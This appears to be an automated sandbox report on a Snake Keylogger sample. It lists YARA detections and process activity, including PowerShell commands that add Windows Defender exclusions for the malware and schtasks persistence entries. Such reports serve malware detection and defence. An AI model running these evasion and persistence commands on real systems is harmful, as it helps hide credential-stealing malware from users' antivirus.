                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: PvAmrCZENy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: yxXYABHh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/19@3/4
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile created: C:\Users\user\AppData\Roaming\yxXYABHh.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4DA1.tmpJump to behavior
                Source: PvAmrCZENy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PvAmrCZENy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002839000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002849000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.000000000287C000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002889000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002857000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000309A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000003068000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000304A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000308E000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000305A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PvAmrCZENy.exeVirustotal: Detection: 77%
                Source: PvAmrCZENy.exeReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile read: C:\Users\user\Desktop\PvAmrCZENy.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\yxXYABHh.exe C:\Users\user\AppData\Roaming\yxXYABHh.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeProcess created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeProcess created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
